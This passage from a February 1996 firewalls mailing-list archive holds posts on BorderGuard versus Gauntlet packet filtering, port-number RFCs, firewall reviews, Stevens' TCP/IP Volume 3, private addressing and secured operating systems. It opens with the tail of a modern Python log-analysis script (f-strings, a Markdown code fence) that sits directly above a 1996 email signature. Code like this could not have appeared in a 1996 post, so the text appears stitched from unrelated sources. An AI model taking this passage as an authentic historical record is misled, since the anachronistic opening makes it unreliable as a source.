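        s = summary.setdefault(e.remote_host, {
            "attempts": 0,
            "blocked": 0,
            "explained_by_outbound": e.remote_host in talked_to,
        })
        s["attempts"] += 1
        s["blocked"] += 1 if e.blocked else 0
    return summary


if __name__ == "__main__":
    for host, s in ident_callbacks(parse_log(SAMPLE_LOG)).items():
        tag = ("ident call-back after our web request"
               if s["explained_by_outbound"] else "unexplained probe")
        print(f"{host}: {s['attempts']} attempts, {s['blocked']} blocked  [{tag}]")
```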
---------------------------------------
| Bill Bunting, Software Engineer       |        ******
|Inter-National Research Institute, Inc.|    ***_******_ __ _
| 1441 Crossways Boulevard, Suite 102   |  ===//=/\**//=/- )==//=
| Chesapeake, Virginia 23320            |  {==//=//\\//=//||==//==
| V(804)424-8675 F(804)420-4262         |  =//=//==\/*//=||=//===
| (wbunting@inri.com)                   |      *********
| (bunting@cs.odu.edu)                  |        *****
| http://www.cs.odu.edu/~bunting        |
---------------------------------------

From firewalls-owner Wed Feb 14 03:54:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA17126 for firewalls-outgoing; Wed, 14 Feb 1996 03:48:52 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA17120 for ; Wed, 14 Feb 1996 03:48:43 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA04915; Wed, 14 Feb 96 05:51:01 CST Received: by mnbp.network.com with Microsoft Mail id <3121CB74@mnbp.network.com>; Wed, 14 Feb 96 05:45:56 CST From: Michael Brown To: jeromie , sengle Cc: firewalls Subject: RE: Gauntlet 3.1 Packet Filter? Date: Wed, 14 Feb 96 05:44:00 CST Message-Id: <3121CB74@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

BROWNMK@misf.network.com wrote:
> You're looking for the NSC equipment, i.e. BorderGuard.
> check out www.network.com and look at security stuff.
>
> _____________________________________________________

sengle@hti.net wrote:
> Subject: Gauntlet 3.1 Packet Filter?
> Date: Monday, February 12, 1996 2:00PM
>
> I checked out the TIS web site and could not find any specific statements
> toward "yes, it packet filters".

jeromie wrote:
Don't forget to mention that your BorderGuard product is simply a packet filtering mechanism.
______________________________________________

You should double-check the network.com web site. This is NOT simply a packet filter device.
This is an Application level firewall, enhanced packet filtering, Secure VPN access device, and encryption routing device supporting DES, 3DES, NSC1 and IDEA standards, plus MUCH more. I am not going to do a sales job on y'all, but don't make a statement that is incorrect. As a packet filtering device the performance is faster than any other product on the market because of the hardware architecture design.

mkb

From firewalls-owner Wed Feb 14 04:39:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA18868 for firewalls-outgoing; Wed, 14 Feb 1996 04:33:44 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA18863 for ; Wed, 14 Feb 1996 04:33:40 -0800 (PST) Received: from vse1 by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id JAA17257; Sun, 11 Feb 1996 09:26:43 -0500 Received: from jeffs_winpc by vse1 (4.1/SMI-4.1) id AA05549; Wed, 14 Feb 96 07:28:42 EST Message-Id: <9602141228.AA05549@vse1> X-Sender: jtank@vse1.vsecorp.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 14 Feb 1996 07:32:44 -0500 To: firewalls@GreatCircle.COM From: "Jeffry L'H. Tank" Subject: list of port numbers above 255 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi all

Can anyone tell me if there is a faq or rfc detailing port numbers above 255? I have already downloaded rfc 1010. Is this the latest rfc on assigned-numbers?

Thanks

Jeffry L'H. Tank sysop VSE Corp.
Internet Server

From firewalls-owner Wed Feb 14 04:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19424 for firewalls-outgoing; Wed, 14 Feb 1996 04:48:36 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19419 for ; Wed, 14 Feb 1996 04:48:32 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA04166; Wed, 14 Feb 1996 07:45:39 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA28821; Wed, 14 Feb 1996 07:44:22 +0500 Date: Wed, 14 Feb 1996 07:44:22 +0500 Message-Id: <9602141244.AA28821@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: Re: Firewall comparison chart??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 01:07 PM 2/13/96 -0600, Doug Hughes wrote:
>
>Network Computing (just arrived today) has a review of 6 firewall
>products. I haven't read it yet, I don't know which ones they are
>evaluating. It's a feature article though.
>

I read the article. It seemed to me to just concentrate on how easy each of the considered firewalls was to set up and maintain. Of course, because of that Firewall-1 was the one they slobbered over, with Harris' Cyberguard coming in second.

-jim-

___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself...
| | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________|

From firewalls-owner Wed Feb 14 05:11:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20357 for firewalls-outgoing; Wed, 14 Feb 1996 05:04:34 -0800 (PST) Received: from eci-esyst.com (callisto.eci-esyst.com [199.186.17.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20349 for ; Wed, 14 Feb 1996 05:04:26 -0800 (PST) Received: by eci-esyst.com (4.1/SMI-4.1) id AA14974; Wed, 14 Feb 96 07:59:17 EST Received: from rodney.eci-esyst.com(199.186.17.5) by callisto.eci-esyst.com via smap (V1.3mjr) id sma014945; Wed Feb 14 07:58:39 1996 Received: from qmgate (qmgate.eci-esyst.com) by callisto (4.1/SMI-4.1) id AA04229; Wed, 14 Feb 96 07:59:55 EST Message-Id: Date: 14 Feb 1996 07:59:17 -0500 From: "Tim Darnauer" Subject: Re#c#_Firewall_comparison_ch#201# To: "firewalls*greatcircle.com" X-Mailer: Mail*Link SMTP-QM 3.0.2 Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1"; Name="Message Body" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

RE>>Firewall comparison ch* via Mail*Link® for PowerTalk*/QM

Try Computer Security Journal, Vol XI, No. 1, 1995. They have an extensive chart.
From firewalls-owner Wed Feb 14 05:25:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19785 for firewalls-outgoing; Wed, 14 Feb 1996 04:56:11 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19777 for ; Wed, 14 Feb 1996 04:56:06 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA04251; Wed, 14 Feb 1996 07:53:13 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA28842; Wed, 14 Feb 1996 07:51:56 +0500 Date: Wed, 14 Feb 1996 07:51:56 +0500 Message-Id: <9602141251.AA28842@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: RE: Web browser ports? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Volume 3 of Stevens? What is this one about, has it been out for long? > Copyright 1993. ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... 
| | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________| From firewalls-owner Wed Feb 14 05:39:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20040 for firewalls-outgoing; Wed, 14 Feb 1996 04:59:50 -0800 (PST) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20009 for ; Wed, 14 Feb 1996 04:59:39 -0800 (PST) Received: from tidtest.total.fr by pegase.total.fr with SMTP (16.6/16.2) id AA06435; Wed, 14 Feb 96 13:54:14 +0100 Received: by tidtest.total.fr (4.1/SMI-4.1) id AA04878; Sun, 14 Jan 96 13:57:35 GMT Message-Id: <9601141357.AA04878@tidtest.total.fr> To: Sick Puppy Cc: firewalls@greatcircle.com Subject: Re: Need a few pointers In-Reply-To: Your message of "Mon, 05 Feb 1996 17:41:51 EST." Date: Sun, 14 Jan 1996 13:57:34 +0000 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message , Sick Puppy writes: > There was a very good response to my query. I had no idea there were > so many security problems and performance problems associated with > WindBlows 95. Sounds like the operating system was written by a couple > of drunken cats. In a couple of days I will get the responses together > in one file, together with a couple of good web pointers, and pass it on > to anyone who wants an e-mailed copy. > > Sick Puppy, the Cat_Eating_Dawg Either you didn't get to post it or (more likely) I was careless with the delete button :-(. Could you send me a copy ? 
advTHANKSance Michel Lavondes (lavondes@tidtest.total.fr) #include ** CDA warning : don't read this if you're under 18 ** Don't whistle while you piss Hagbard Celine

From firewalls-owner Wed Feb 14 06:32:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA23044 for firewalls-outgoing; Wed, 14 Feb 1996 06:11:45 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA23037 for ; Wed, 14 Feb 1996 06:11:39 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199602141411.GAA23037@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 7593; Wed, 14 Feb 96 09:10:42 EST Date: Wed, 14 Feb 1996 09:10:41 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: PC s/w for testing TCP Ports Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

subject:PC s/w for testing TCP Ports

Can anyone direct me to an ftp site that holds a PC program for testing TCP ports? Ideally it should allow me to specify an IP address and a port number, and then create packets from entry via the screen. Any return packets should have the payload stripped out & displayed - but it would be nice to be able to view the whole packet. I'm looking for this to enable me to test a firewall product.

Mark gblolmxb@ibmmail.com

From firewalls-owner Wed Feb 14 06:39:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA23250 for firewalls-outgoing; Wed, 14 Feb 1996 06:18:39 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA23221 for ; Wed, 14 Feb 1996 06:18:30 -0800 (PST) Received: by garrison.com.
(4.1/Nutered Mailer) id AA02503; Wed, 14 Feb 96 08:15:16 CST Date: Wed, 14 Feb 96 08:15:16 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602141415.AA02503@garrison.com.> To: sengle@hti.net, BROWNMK@misf.network.com Subject: RE: Gauntlet 3.1 Packet Filter? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> BROWNMK@misf.network.com wrote:
> > You're looking for the NSC equipment, i.e. BorderGuard.
> > check out www.network.com and look at security stuff.
> >
> > _____________________________________________________
>
> sengle@hti.net wrote:
> > Subject: Gauntlet 3.1 Packet Filter?
> > Date: Monday, February 12, 1996 2:00PM
> >
> > I checked out the TIS web site and could not find any specific statements
> > toward "yes, it packet filters".
>
> jeromie wrote:
> Don't forget to mention that your BorderGuard product is simply a
> packet filtering mechanism.
>
> ______________________________________________
> You should double-check the network.com web site. This is NOT simply
> a packet filter device. This is an Application level firewall, enhanced
> packet filtering, Secure VPN access device, and encryption routing device
> supporting DES, 3DES, NSC1 and IDEA standards, plus MUCH more. I am not
> going to do a sales job on y'all, but don't make a statement that is
> incorrect. As a packet filtering device the performance is faster than any
> other product on the market because of the hardware architecture
> design.
> mkb

Uhhuh... I thought we were talking about the BorderGuard product. I am familiar with the product, as we have purchased & installed them before for a client. They are basically a router with an encryption engine in it. I would agree with you that the product has good throughput, from what we've seen. As for being an 'application gateway' it's not, unless you changed it in the last 2 months.
Basically it uses packet filtering for access control, can do encryption to create VPN's, and also w/ the DPF facility can look @ bytes @ given offsets within the packets. This does NOT constitute an application level gateway. Where are your proxies? (Don't tell me they are in the firmware. Jeromie Jackson Garrison technologies jeromie@garrison.com From firewalls-owner Wed Feb 14 07:12:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA24725 for firewalls-outgoing; Wed, 14 Feb 1996 07:01:36 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA24711 for ; Wed, 14 Feb 1996 07:01:24 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id JAA08544; Wed, 14 Feb 1996 09:58:26 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA29252; Wed, 14 Feb 1996 09:57:09 +0500 Date: Wed, 14 Feb 1996 09:57:09 +0500 Message-Id: <9602141457.AA29252@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: Re: Web browser ports? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> >Volume 3 of Stevens? What is this one about, has it been out for long? >> Copyright 1993. > >Uhmm... Volume 1 of Stevens did not come out until 1994. Volume 2 was >released in 1995. Are you perhaps thinking of Comer "Internetworking >with TCP/IP" [3 volumes] rather than Stevens "TCP/IP Illustrated" [only >2 that I know of]? Perhaps you mean some other Stevens? What is the >title? > Oops. You're right. -jim- ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... 
|
|            leggj@liebert.com (cc:Mail) |                                   |
|_______________________________________|___________________________________|

From firewalls-owner Wed Feb 14 07:34:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA24768 for firewalls-outgoing; Wed, 14 Feb 1996 07:02:57 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA24759 for ; Wed, 14 Feb 1996 07:02:49 -0800 (PST)
Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id KAA21638; Wed, 14 Feb 1996 10:02:10 -0500 (EST)
Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id KAA11907; Wed, 14 Feb 1996 10:02:03 -0500 (EST)
Date: Wed, 14 Feb 1996 10:01:58 -0500 (EST)
From: "Paul D. Robertson"
To: Jim Legg
cc: firewalls@GreatCircle.COM
Subject: RE: Web browser ports?
In-Reply-To: <9602141251.AA28842@sun1plus.liebert.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 14 Feb 1996, Jim Legg wrote:

> Date: Wed, 14 Feb 1996 07:51:56 +0500
> From: Jim Legg
> To: firewalls@GreatCircle.COM
> Subject: RE: Web browser ports?
>
> >Volume 3 of Stevens? What is this one about, has it been out for long?
>
> Copyright 1993.

Right under that, first printing January 1996.

> ___________________________________________________________________________
> |                                       |                                   |
> | Jim Legg   legg@liebert.com (smtp)    | Speaking for myself...            |
> |            leggj@liebert.com (cc:Mail) |                                   |
> |_______________________________________|___________________________________|
>

-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Wed Feb 14 08:02:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA25735 for firewalls-outgoing; Wed, 14 Feb 1996 07:42:57 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA25730 for ; Wed, 14 Feb 1996 07:42:53 -0800 (PST)
Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id KAA00798 for ; Wed, 14 Feb 1996 10:42:16 -0500 (EST)
From: "Marcus J. Ranum"
Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id KAA27729 for Firewalls@GreatCircle.COM; Wed, 14 Feb 1996 10:42:10 -0500 (EST)
Message-Id: <199602141542.KAA27729@clark.net>
Subject: Stevens, Vol 3
To: Firewalls@GreatCircle.COM
Date: Wed, 14 Feb 1996 10:42:06 -0500 (EST)
In-Reply-To: <199602140900.BAA09233@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Feb 14, 96 01:00:34 am
Reply-To: mjr@v-one.com
Organization: V-One Corporation, Baltimore, MD
Office Phone: 410-889-8569
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Volume 3 of Stevens? What is this one about, has it been out for long?

It's called "TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols" and it's only been out a short time. ISBN# is 0-201-63495-3

Basically, it looks like Rich has now studied IP and its implementation as part of his previous books, and has decided to fix it. :)

Joking aside, the book is a wonderful analysis of TCP and how/why it performs, including some really detailed studies of really nitty-gritty performance interactions. My take on this book is that it is an absolutely wonderful example of how to apply scientific thinking and analysis to a technological problem.

This is going to sound odd, but the whole book reads like one of Jeff Mogul's USENIX papers -- which is a roundabout way of saying that it is of the highest caliber of technical writing and thinking.

mjr.

From firewalls-owner Wed Feb 14 08:15:13 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA25688 for firewalls-outgoing; Wed, 14 Feb 1996 07:40:04 -0800 (PST)
Received: from cpmx.saic.com (cpmx.saic.com [139.121.16.80]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA25683 for ; Wed, 14 Feb 1996 07:40:00 -0800 (PST)
Received: from cpqm.saic.com by cpmx.saic.com; Wed, 14 Feb 96 07:39:10 -0800
Message-ID:
Date: 14 Feb 1996 10:04:35 -0700
From: "Ashley Miller"
Subject: Re: Need a few pointers
To: firewalls@greatcircle.com, "Sick Puppy" , "Michel Lavondes"
X-Mailer: Mail*Link SMTP-QM 3.0.2
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Me too.

------------------------------
Date: 2/14/96 6:43 AM
To: Ashley Miller
From: Michel Lavondes

In message , Sick Puppy writes:
> There was a very good response to my query. I had no idea there were
> so many security problems and performance problems associated with
> WindBlows 95. Sounds like the operating system was written by a couple
> of drunken cats. In a couple of days I will get the responses together
> in one file, together with a couple of good web pointers, and pass it on
> to anyone who wants an e-mailed copy.
>
> Sick Puppy, the Cat_Eating_Dawg

Either you didn't get to post it or (more likely) I was careless with the delete button :-(. Could you send me a copy ?
advTHANKSance

Michel Lavondes (lavondes@tidtest.total.fr)
#include
** CDA warning : don't read this if you're under 18 **
Don't whistle while you piss
Hagbard Celine

------------------ RFC822 Header Follows ------------------
Received: by cpqm.saic.com with SMTP;14 Feb 1996 06:31:40 U
Received: from relay6.UU.NET by cpmx.saic.com; Wed, 14 Feb 96 06:37:49 -0800
Received: from miles.greatcircle.com by relay6.UU.NET with ESMTP id QQacww06562; Wed, 14 Feb 1996 09:36:30 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20040 for firewalls-outgoing; Wed, 14 Feb 1996 04:59:50 -0800 (PST)
Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20009 for ; Wed, 14 Feb 1996 04:59:39 -0800 (PST)
Received: from tidtest.total.fr by pegase.total.fr with SMTP (16.6/16.2) id AA06435; Wed, 14 Feb 96 13:54:14 +0100
Received: by tidtest.total.fr (4.1/SMI-4.1) id AA04878; Sun, 14 Jan 96 13:57:35 GMT
Message-Id: <9601141357.AA04878@tidtest.total.fr>
To: Sick Puppy
Cc: firewalls@greatcircle.com
Subject: Re: Need a few pointers
In-Reply-To: Your message of "Mon, 05 Feb 1996 17:41:51 EST."
Date: Sun, 14 Jan 1996 13:57:34 +0000
From: Michel Lavondes
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Wed Feb 14 08:28:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA26404 for firewalls-outgoing; Wed, 14 Feb 1996 08:01:16 -0800 (PST)
Received: from deserthosp.org ([192.251.121.175]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA26393; Wed, 14 Feb 1996 08:01:09 -0800 (PST)
From: CWSTAFFORD@deserthosp.org
Received: from WPDOMAIN-Message_Server by deserthosp.org with WordPerfect_Office; Wed, 14 Feb 1996 07:59:52 -0800
Message-Id:
X-Mailer: WordPerfect Office 4.0
Date: Wed, 14 Feb 1996 07:59:36 -0800
To: firewalls-digest@GreatCircle.COM, firewalls-digest-owner@GreatCircle.COM
Subject: Firewalls-Digest V5 #97 -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am looking for a firewall product. I want to provide a web server to the Internet. I also want to protect my LAN network. What is the quickest, most cost-effective method to perform this? Are there shareware products on the market? Thank you for any info you can provide.
-Chris

From firewalls-owner Wed Feb 14 08:49:59 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA26510 for firewalls-outgoing; Wed, 14 Feb 1996 08:06:23 -0800 (PST)
Received: from athena.bournemouth.ac.uk (athena.bournemouth.ac.uk [194.66.72.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA26440 for ; Wed, 14 Feb 1996 08:04:06 -0800 (PST)
Received: by athena.bournemouth.ac.uk (8.6.11/8.6.11) with SMTP id QAA18480 for ; Wed, 14 Feb 1996 16:02:34 GMT
Date: Wed, 14 Feb 1996 16:02:34 GMT
Message-Id: <199602141602.QAA18480@athena.bournemouth.ac.uk>
X-Sender: jjury@athena.bournemouth.ac.uk
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Firewalls@GreatCircle.COM
From: jjury@bournemouth.ac.uk (James Jury)
Subject: Request from a student
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am a student of Bournemouth University in the UK, and I am writing a research paper on whether there is a correlation between an organisation type and the type of firewall solution chosen to protect it.

Anybody wishing to help me can, by sending me details of what type of organisation you represent and which of the following type of firewall your organisation uses, and the main reason why it was chosen: Screening Router; Unix Based; Application Level or otherwise state.

I understand that it would be unwise to disclose the exact details of your firewall, which is why the classifications are so broad.

I thank you in advance for reading this and considering to help.
From firewalls-owner Wed Feb 14 09:24:40 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA28577 for firewalls-outgoing; Wed, 14 Feb 1996 09:14:15 -0800 (PST)
Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.108]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA28572 for ; Wed, 14 Feb 1996 09:14:05 -0800 (PST)
Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id aw01916; 13 Feb 96 21:24 GMT
Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-3.mail.demon.net id ac26791; 13 Feb 96 21:21 GMT
From: Les Carleton
To: firewalls@greatcircle.com
Subject: The Secure Operating Systems Question
Date: Tue, 13 Feb 1996 13:21:35 GMT
Organization: The Doghouse
Reply-To: les@tracker.demon.co.uk
Message-Id: <31208d38.900440@158.152.1.72>
X-Mailer: Forte Agent .99d/16.182
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi folks,

I've recently had customers coming up more and more with the "Secured operating system" question. That is ... what is the benefit of having a specially secured operating system on a machine which no one is going to be logging in to?

Now, I have my own opinions on this one, but I'd like a more general view from the list (if one exists). I'm not in the business of starting a holy war, so I'd kind of like facts only please.

Now I have a few conditions I'd like to put on the firewall host in question.

1) It sits between the internet and an internal network and all traffic goes through it.
2) It's an application gateway (like fwtk, gauntlet, raptor, etc). There is no packet routing going on.
3) There are no login users (except root, whose access is controlled by a securid card or other secure password scheme).
4) The only network ports enabled are pointed at proxy daemons.
5) The firewall is physically secure.

The question is ...

Is there any benefit in having an MLS or specially secured operating system on the host or will a standard opsys meeting these criteria do?

Like I said, I have my own opinions, but I'm going to reserve them for now; I'd welcome the opinion of the list.

Thanks!

...Les... "Seeing if his logic is correct :-)"

+-----------------------------------------------+
| Les Carleton Firewalling Consultant           / "The Software Lifeguard"
| These are my views ... not my employer's      / les@tracker.demon.co.uk
|                                              /
+-------------------------------------------+
"Open Standards ... Free Software ... Live Free or Fry!"

From firewalls-owner Wed Feb 14 09:44:46 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA28595 for firewalls-outgoing; Wed, 14 Feb 1996 09:14:34 -0800 (PST)
Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA28580 for ; Wed, 14 Feb 1996 09:14:26 -0800 (PST)
Received: from cohiba (golda@cohiba [204.243.240.5]) by cohiba.predictive.com (8.6.12/8.6.12) with SMTP id LAA01932 for ; Wed, 14 Feb 1996 11:42:47 -0500
Date: Wed, 14 Feb 1996 11:42:45 -0500 (EST)
From: Rachel Rosencrantz
X-Sender: golda@cohiba
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V5 #45
In-Reply-To: <199601201127.DAA18667@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Michael Ryan
> Date: Fri, 19 Jan 1996 10:29:54 GMT
> Subject: Perimeter net and official net addresses
>
> Hi folks,
>
> I've been tuned into this list for a few months now and here's my first
> posting.
>
> I'm attaching to the Internet for the first time. If I set up a perimeter
> network between my internal net and the Internet, the way I see it,
> I have three choices.
>
> .....first two options deleted.....
>
> (c) Use a Class C address on the perimeter net and a private IP address
> on the internal net (c.f. RFC1597).
> My problems with this are:
> (1) Any expert whose opinion I've read says keep away from using
> private addresses.
> (2) Direct connections are not possible between the inside and the
> outside; proxying or NAT must be used always.
> However, I see advantages to this scheme also:
> (1) If proxying is used to give insiders access to the outside, then,
> it's not possible for a bad guy on the outside to mount an
> IP address spoofing or source routing attack, as by the rules of
> RFC1597, my ISP must filter out private addresses from going through
> their routers (I realise there's an element of trust on my part for my
> ISP here).
> (2) It overcomes the disadvantages of (a) and (b) above.
>
>

Now I won't claim to be an expert, but I would go with option 3. If the inside addresses are private (or "illegal") addresses there are fewer means to figure out what IP addresses your inside machines have. (Ok, that is security through obscurity, but if you aren't using it as your sole means of security it's ok.) Secondly, I know Raptor, and I believe other firewall vendors do do mapping of illegal IP addresses to the unused addresses at the 10.0... range, so going out on the net doesn't pose a problem if you choose the same set of IPs that IBM is using. Also there are the advantages of not having to get 2 sets of numbers or subnetting a class C.

-Rachel

From firewalls-owner Wed Feb 14 10:01:38 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA29611 for firewalls-outgoing; Wed, 14 Feb 1996 09:42:45 -0800 (PST)
Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.108]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA29599 for ; Wed, 14 Feb 1996 09:42:29 -0800 (PST)
Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ai05641; 13 Feb 96 21:58 GMT
Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-3.mail.demon.net id aa06247; 13 Feb 96 21:49 GMT
From: Les Carleton
To: firewalls@greatcircle.com
Subject: Re: The Secure Operating Systems Question
Date: Tue, 13 Feb 1996 13:49:12 GMT
Organization: The Doghouse
Reply-To: les@tracker.demon.co.uk
Message-Id: <312096a9.3316591@158.152.1.72>
X-Mailer: Forte Agent .99d/16.182
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Oh ... I forgot to mention ...

6) The proxy daemon code does not contain any calls to exec or system

...Les...

+-----------------------------------------------+
| Les Carleton Firewalling Consultant           / "The Software Lifeguard"
| These are my views ... not my employer's      / les@tracker.demon.co.uk
|                                              /
+-------------------------------------------+
"Open Standards ... Free Software ... Live Free or Fry!"
From firewalls-owner Wed Feb 14 10:58:05 1996
